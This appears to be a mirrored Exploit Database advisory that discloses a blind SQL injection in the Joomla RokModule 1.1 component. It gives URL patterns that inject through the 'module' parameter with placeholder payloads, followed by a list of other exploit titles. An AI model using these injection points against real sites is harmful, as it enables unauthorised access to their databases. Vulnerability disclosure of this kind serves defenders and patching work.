Joomla! Component RokModule 1.1 – ‘module’ Blind SQL Injection

Exploit Database
16 阅读

作者： Yarolinux

日期： 2012-09-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/21221/

Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability

Nombre del Componente: Com_rokmodule

Empresa: http://www.rockettheme.com/

Testeado: Linux Backtrack

Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux

Fecha: 09/09/2012

Bueno la Injeccion Va de la siguiente manera:

http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]

http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]


Ok! Eso es todo Difrutenlo!

Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy 
pronto resultados :D

Greetz: Dylan Irzi & WebSecurityDev

last Exploits
Joomla! Component RokModule 1.1 – ‘module’ Blind SQL Injection的更多信息

forma.lms The E-Learning Suite 2.3.0.2 – Persistent Cross-Site Scripting：
SPA-CART CMS – Stored XSS：
Zomplog 3.9 – Cross-site scripting (XSS)：
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities：
WedgeOS 4.0.4 – Multiple Vulnerabilities：
News Website Script 2.0.5 – SQL Injection：
ANE CMD CRSF – Arbitrary Add Admin：
rgboard 4.2.1 – SQL Injection：